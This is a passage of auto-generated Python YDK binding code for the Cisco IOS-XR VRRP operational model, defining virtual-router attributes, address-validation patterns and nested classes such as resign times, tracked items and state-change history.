**range:** 0..4294967295
**config**\: False
.. attribute:: min_delay_time
Minimum delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: reload_delay_time
Reload delay time in msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: delay_timer_flag
Delay timer running flag
**type**\: bool
**config**\: False
.. attribute:: delay_timer_secs
Delay timer running time secs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: delay_timer_msecs
Delay timer running time msecs
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: millisecond
.. attribute:: authentication_flag
Text authentication configured flag
**type**\: bool
**config**\: False
.. attribute:: force_timer_flag
Configured timers forced flag
**type**\: bool
**config**\: False
.. attribute:: preempt_flag
Preempt configured flag
**type**\: bool
**config**\: False
.. attribute:: ip_address_owner_flag
IP address owner flag
**type**\: bool
**config**\: False
.. attribute:: is_accept_mode
Is accept mode
**type**\: bool
**config**\: False
.. attribute:: preempt_delay_time
Preempt delay time
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: configured_priority
Configured priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: operational_priority
Operational priority
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority_decrement
Priority decrement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_count
Number of items tracked
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_interface_up_count
Number of tracked items up
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_count
Number of tracked items
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_up_count
Number of tracked items in UP state
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_in_current_state
Time in current state, in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: state_change_count
Number of state changes
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_vrouter_up
Time the virtual router has been up, in centiseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: centisecond
.. attribute:: master_count
Number of times this router has become master
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_received_count
Number of advertisements received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advert_interval_error_count
Advertise interval errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adverts_sent_count
Number of advertisements sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: authentication_fail_count
Authentication failures
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ttl_error_count
TTL errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_received_count
Number of priority-zero packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: priority_zero_sent_count
Number of priority-zero packets sent
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_packet_count
Invalid packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address_list_error_count
Address list errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: invalid_auth_type_count
Invalid authentication type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_type_mismatch_count
Authentication type mismatches
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_length_errors_count
Packet length errors
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: time_stats_discontinuity
Time since a statistics discontinuity in ticks (10ns units)
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_session_state
BFD session state
**type**\: :py:class:`VrrpBfdSessionState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBfdSessionState>`
**config**\: False
.. attribute:: bfd_interval
BFD packet send interval
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_multiplier
BFD multiplier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bfd_cfg_remote_ip
BFD configured remote IP
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bfd_configured_remote_ipv6_address
BFD configured remote IPv6
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state_from_checkpoint
Whether state recovered from checkpoint
**type**\: bool
**config**\: False
.. attribute:: interface_ipv4_address
The Interface Primary IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: interface_ipv6_address
The interface link-local IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: virtual_mac_address
Virtual MAC address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
**config**\: False
.. attribute:: virtual_mac_address_state
Virtual MAC address state
**type**\: :py:class:`VrrpVmacState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpVmacState>`
**config**\: False
.. attribute:: operational_address
Operational IPv4 VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv4_configured_down_address
IPv4 Configured but Down VRRP addresses
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_operational_address
IPv6 Operational VRRP addresses
**type**\: list of :py:class:`Ipv6OperationalAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress>`
**config**\: False
.. attribute:: ipv6_configured_down_address
IPv6 Configured but Down VRRP addresses
**type**\: list of :py:class:`Ipv6ConfiguredDownAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress>`
**config**\: False
.. attribute:: track_item_info
Track Item Info
**type**\: list of :py:class:`TrackItemInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo>`
**config**\: False
.. attribute:: state_change_history
State change history
**type**\: list of :py:class:`StateChangeHistory <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter, self).__init__()
self.yang_name = "virtual-router"
self.yang_parent_name = "virtual-routers"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name','virtual_router_id']
self._child_classes = OrderedDict([("resign-sent-time", ("resign_sent_time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime)), ("resign-received-time", ("resign_received_time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime)), ("ipv6-operational-address", ("ipv6_operational_address", Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress)), ("ipv6-configured-down-address", ("ipv6_configured_down_address", Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress)), ("track-item-info", ("track_item_info", Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo)), ("state-change-history", ("state_change_history", Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('virtual_router_id', (YLeaf(YType.uint32, 'virtual-router-id'), ['int'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('version', (YLeaf(YType.uint8, 'version'), ['int'])),
('address_family', (YLeaf(YType.enumeration, 'address-family'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBAf', '')])),
('session_name', (YLeaf(YType.str, 'session-name'), ['str'])),
('slaves', (YLeaf(YType.uint32, 'slaves'), ['int'])),
('is_slave', (YLeaf(YType.boolean, 'is-slave'), ['bool'])),
('followed_session_name', (YLeaf(YType.str, 'followed-session-name'), ['str'])),
('secondary_address_count', (YLeaf(YType.uint8, 'secondary-address-count'), ['int'])),
('operational_address_count', (YLeaf(YType.uint8, 'operational-address-count'), ['int'])),
('primary_virtual_ip', (YLeaf(YType.str, 'primary-virtual-ip'), ['str'])),
('configured_down_address_count', (YLeaf(YType.uint8, 'configured-down-address-count'), ['int'])),
('virtual_linklocal_ipv6_address', (YLeaf(YType.str, 'virtual-linklocal-ipv6-address'), ['str'])),
('primary_state', (YLeaf(YType.enumeration, 'primary-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVipState', '')])),
('master_ip_address', (YLeaf(YType.str, 'master-ip-address'), ['str'])),
('master_ipv6_address', (YLeaf(YType.str, 'master-ipv6-address'), ['str'])),
('master_priority', (YLeaf(YType.uint8, 'master-priority'), ['int'])),
('vrrp_state', (YLeaf(YType.enumeration, 'vrrp-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('authentication_type', (YLeaf(YType.enumeration, 'authentication-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpProtAuth', '')])),
('authentication_string', (YLeaf(YType.str, 'authentication-string'), ['str'])),
('configured_advertize_time', (YLeaf(YType.uint32, 'configured-advertize-time'), ['int'])),
('oper_advertize_time', (YLeaf(YType.uint32, 'oper-advertize-time'), ['int'])),
('min_delay_time', (YLeaf(YType.uint32, 'min-delay-time'), ['int'])),
('reload_delay_time', (YLeaf(YType.uint32, 'reload-delay-time'), ['int'])),
('delay_timer_flag', (YLeaf(YType.boolean, 'delay-timer-flag'), ['bool'])),
('delay_timer_secs', (YLeaf(YType.uint32, 'delay-timer-secs'), ['int'])),
('delay_timer_msecs', (YLeaf(YType.uint32, 'delay-timer-msecs'), ['int'])),
('authentication_flag', (YLeaf(YType.boolean, 'authentication-flag'), ['bool'])),
('force_timer_flag', (YLeaf(YType.boolean, 'force-timer-flag'), ['bool'])),
('preempt_flag', (YLeaf(YType.boolean, 'preempt-flag'), ['bool'])),
('ip_address_owner_flag', (YLeaf(YType.boolean, 'ip-address-owner-flag'), ['bool'])),
('is_accept_mode', (YLeaf(YType.boolean, 'is-accept-mode'), ['bool'])),
('preempt_delay_time', (YLeaf(YType.uint16, 'preempt-delay-time'), ['int'])),
('configured_priority', (YLeaf(YType.uint8, 'configured-priority'), ['int'])),
('operational_priority', (YLeaf(YType.uint8, 'operational-priority'), ['int'])),
('priority_decrement', (YLeaf(YType.uint32, 'priority-decrement'), ['int'])),
('tracked_interface_count', (YLeaf(YType.uint32, 'tracked-interface-count'), ['int'])),
('tracked_interface_up_count', (YLeaf(YType.uint32, 'tracked-interface-up-count'), ['int'])),
('tracked_item_count', (YLeaf(YType.uint32, 'tracked-item-count'), ['int'])),
('tracked_item_up_count', (YLeaf(YType.uint32, 'tracked-item-up-count'), ['int'])),
('time_in_current_state', (YLeaf(YType.uint32, 'time-in-current-state'), ['int'])),
('state_change_count', (YLeaf(YType.uint32, 'state-change-count'), ['int'])),
('time_vrouter_up', (YLeaf(YType.uint32, 'time-vrouter-up'), ['int'])),
('master_count', (YLeaf(YType.uint32, 'master-count'), ['int'])),
('adverts_received_count', (YLeaf(YType.uint32, 'adverts-received-count'), ['int'])),
('advert_interval_error_count', (YLeaf(YType.uint32, 'advert-interval-error-count'), ['int'])),
('adverts_sent_count', (YLeaf(YType.uint32, 'adverts-sent-count'), ['int'])),
('authentication_fail_count', (YLeaf(YType.uint32, 'authentication-fail-count'), ['int'])),
('ttl_error_count', (YLeaf(YType.uint32, 'ttl-error-count'), ['int'])),
('priority_zero_received_count', (YLeaf(YType.uint32, 'priority-zero-received-count'), ['int'])),
('priority_zero_sent_count', (YLeaf(YType.uint32, 'priority-zero-sent-count'), ['int'])),
('invalid_packet_count', (YLeaf(YType.uint32, 'invalid-packet-count'), ['int'])),
('address_list_error_count', (YLeaf(YType.uint32, 'address-list-error-count'), ['int'])),
('invalid_auth_type_count', (YLeaf(YType.uint32, 'invalid-auth-type-count'), ['int'])),
('auth_type_mismatch_count', (YLeaf(YType.uint32, 'auth-type-mismatch-count'), ['int'])),
('pkt_length_errors_count', (YLeaf(YType.uint32, 'pkt-length-errors-count'), ['int'])),
('time_stats_discontinuity', (YLeaf(YType.uint32, 'time-stats-discontinuity'), ['int'])),
('bfd_session_state', (YLeaf(YType.enumeration, 'bfd-session-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBfdSessionState', '')])),
('bfd_interval', (YLeaf(YType.uint32, 'bfd-interval'), ['int'])),
('bfd_multiplier', (YLeaf(YType.uint32, 'bfd-multiplier'), ['int'])),
('bfd_cfg_remote_ip', (YLeaf(YType.str, 'bfd-cfg-remote-ip'), ['str'])),
('bfd_configured_remote_ipv6_address', (YLeaf(YType.str, 'bfd-configured-remote-ipv6-address'), ['str'])),
('state_from_checkpoint', (YLeaf(YType.boolean, 'state-from-checkpoint'), ['bool'])),
('interface_ipv4_address', (YLeaf(YType.str, 'interface-ipv4-address'), ['str'])),
('interface_ipv6_address', (YLeaf(YType.str, 'interface-ipv6-address'), ['str'])),
('virtual_mac_address', (YLeaf(YType.str, 'virtual-mac-address'), ['str'])),
('virtual_mac_address_state', (YLeaf(YType.enumeration, 'virtual-mac-address-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpVmacState', '')])),
('operational_address', (YLeafList(YType.str, 'operational-address'), ['str'])),
('ipv4_configured_down_address', (YLeafList(YType.str, 'ipv4-configured-down-address'), ['str'])),
])
self.interface_name = None
self.virtual_router_id = None
self.interface_name_xr = None
self.virtual_router_id_xr = None
self.version = None
self.address_family = None
self.session_name = None
self.slaves = None
self.is_slave = None
self.followed_session_name = None
self.secondary_address_count = None
self.operational_address_count = None
self.primary_virtual_ip = None
self.configured_down_address_count = None
self.virtual_linklocal_ipv6_address = None
self.primary_state = None
self.master_ip_address = None
self.master_ipv6_address = None
self.master_priority = None
self.vrrp_state = None
self.authentication_type = None
self.authentication_string = None
self.configured_advertize_time = None
self.oper_advertize_time = None
self.min_delay_time = None
self.reload_delay_time = None
self.delay_timer_flag = None
self.delay_timer_secs = None
self.delay_timer_msecs = None
self.authentication_flag = None
self.force_timer_flag = None
self.preempt_flag = None
self.ip_address_owner_flag = None
self.is_accept_mode = None
self.preempt_delay_time = None
self.configured_priority = None
self.operational_priority = None
self.priority_decrement = None
self.tracked_interface_count = None
self.tracked_interface_up_count = None
self.tracked_item_count = None
self.tracked_item_up_count = None
self.time_in_current_state = None
self.state_change_count = None
self.time_vrouter_up = None
self.master_count = None
self.adverts_received_count = None
self.advert_interval_error_count = None
self.adverts_sent_count = None
self.authentication_fail_count = None
self.ttl_error_count = None
self.priority_zero_received_count = None
self.priority_zero_sent_count = None
self.invalid_packet_count = None
self.address_list_error_count = None
self.invalid_auth_type_count = None
self.auth_type_mismatch_count = None
self.pkt_length_errors_count = None
self.time_stats_discontinuity = None
self.bfd_session_state = None
self.bfd_interval = None
self.bfd_multiplier = None
self.bfd_cfg_remote_ip = None
self.bfd_configured_remote_ipv6_address = None
self.state_from_checkpoint = None
self.interface_ipv4_address = None
self.interface_ipv6_address = None
self.virtual_mac_address = None
self.virtual_mac_address_state = None
self.operational_address = []
self.ipv4_configured_down_address = []
self.resign_sent_time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime()
self.resign_sent_time.parent = self
self._children_name_map["resign_sent_time"] = "resign-sent-time"
self.resign_received_time = Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime()
self.resign_received_time.parent = self
self._children_name_map["resign_received_time"] = "resign-received-time"
self.ipv6_operational_address = YList(self)
self.ipv6_configured_down_address = YList(self)
self.track_item_info = YList(self)
self.state_change_history = YList(self)
self._segment_path = lambda: "virtual-router" + "[interface-name='" + str(self.interface_name) + "']" + "[virtual-router-id='" + str(self.virtual_router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-vrrp-oper:vrrp/ipv4/virtual-routers/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter, ['interface_name', 'virtual_router_id', 'interface_name_xr', 'virtual_router_id_xr', 'version', 'address_family', 'session_name', 'slaves', 'is_slave', 'followed_session_name', 'secondary_address_count', 'operational_address_count', 'primary_virtual_ip', 'configured_down_address_count', 'virtual_linklocal_ipv6_address', 'primary_state', 'master_ip_address', 'master_ipv6_address', 'master_priority', 'vrrp_state', 'authentication_type', 'authentication_string', 'configured_advertize_time', 'oper_advertize_time', 'min_delay_time', 'reload_delay_time', 'delay_timer_flag', 'delay_timer_secs', 'delay_timer_msecs', 'authentication_flag', 'force_timer_flag', 'preempt_flag', 'ip_address_owner_flag', 'is_accept_mode', 'preempt_delay_time', 'configured_priority', 'operational_priority', 'priority_decrement', 'tracked_interface_count', 'tracked_interface_up_count', 'tracked_item_count', 'tracked_item_up_count', 'time_in_current_state', 'state_change_count', 'time_vrouter_up', 'master_count', 'adverts_received_count', 'advert_interval_error_count', 'adverts_sent_count', 'authentication_fail_count', 'ttl_error_count', 'priority_zero_received_count', 'priority_zero_sent_count', 'invalid_packet_count', 'address_list_error_count', 'invalid_auth_type_count', 'auth_type_mismatch_count', 'pkt_length_errors_count', 'time_stats_discontinuity', 'bfd_session_state', 'bfd_interval', 'bfd_multiplier', 'bfd_cfg_remote_ip', 'bfd_configured_remote_ipv6_address', 'state_from_checkpoint', 'interface_ipv4_address', 'interface_ipv6_address', 'virtual_mac_address', 'virtual_mac_address_state', 'operational_address', 'ipv4_configured_down_address'], name, value)
class ResignSentTime(_Entity_):
"""
Time last resign was sent
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime, self).__init__()
self.yang_name = "resign-sent-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-sent-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignSentTime']['meta_info']
class ResignReceivedTime(_Entity_):
"""
Time last resign was received
.. attribute:: seconds
Seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: nanoseconds
Nanoseconds
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: nanosecond
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime, self).__init__()
self.yang_name = "resign-received-time"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('seconds', (YLeaf(YType.uint32, 'seconds'), ['int'])),
('nanoseconds', (YLeaf(YType.uint32, 'nanoseconds'), ['int'])),
])
self.seconds = None
self.nanoseconds = None
self._segment_path = lambda: "resign-received-time"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime, ['seconds', 'nanoseconds'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.ResignReceivedTime']['meta_info']
class Ipv6OperationalAddress(_Entity_):
"""
IPv6 Operational VRRP addresses
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, self).__init__()
self.yang_name = "ipv6-operational-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-operational-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6OperationalAddress']['meta_info']
class Ipv6ConfiguredDownAddress(_Entity_):
"""
IPv6 Configured but Down VRRP addresses
.. attribute:: ipv6_address
IPV6Address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, self).__init__()
self.yang_name = "ipv6-configured-down-address"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.ipv6_address = None
self._segment_path = lambda: "ipv6-configured-down-address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress, ['ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.Ipv6ConfiguredDownAddress']['meta_info']
class TrackItemInfo(_Entity_):
"""
Track Item Info
.. attribute:: interface
IM Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: virtual_router_id_xr
Virtual Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: tracked_item_type
Type of tracked item
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: tracked_item_index
Tracked item index
**type**\: str
**length:** 0..32
**config**\: False
.. attribute:: state
State of the tracked item
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: priority
Priority weight of item
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo, self).__init__()
self.yang_name = "track-item-info"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('virtual_router_id_xr', (YLeaf(YType.uint32, 'virtual-router-id-xr'), ['int'])),
('tracked_item_type', (YLeaf(YType.uint16, 'tracked-item-type'), ['int'])),
('tracked_item_index', (YLeaf(YType.str, 'tracked-item-index'), ['str'])),
('state', (YLeaf(YType.uint8, 'state'), ['int'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.interface = None
self.virtual_router_id_xr = None
self.tracked_item_type = None
self.tracked_item_index = None
self.state = None
self.priority = None
self._segment_path = lambda: "track-item-info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo, ['interface', 'virtual_router_id_xr', 'tracked_item_type', 'tracked_item_index', 'state', 'priority'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_vrrp_oper as meta
return meta._meta_table['Vrrp.Ipv4.VirtualRouters.VirtualRouter.TrackItemInfo']['meta_info']
class StateChangeHistory(_Entity_):
"""
State change history
.. attribute:: time
Time of state change
**type**\: :py:class:`Time <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time>`
**config**\: False
.. attribute:: old_state
Old State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: new_state
New State
**type**\: :py:class:`VrrpBagProtocolState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpBagProtocolState>`
**config**\: False
.. attribute:: reason
Reason for state change
**type**\: :py:class:`VrrpStateChangeReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper.VrrpStateChangeReason>`
**config**\: False
"""
_prefix = 'ipv4-vrrp-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory, self).__init__()
self.yang_name = "state-change-history"
self.yang_parent_name = "virtual-router"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("time", ("time", Vrrp.Ipv4.VirtualRouters.VirtualRouter.StateChangeHistory.Time))])
self._leafs = OrderedDict([
('old_state', (YLeaf(YType.enumeration, 'old-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
('new_state', (YLeaf(YType.enumeration, 'new-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_vrrp_oper', 'VrrpBagProtocolState', '')])),
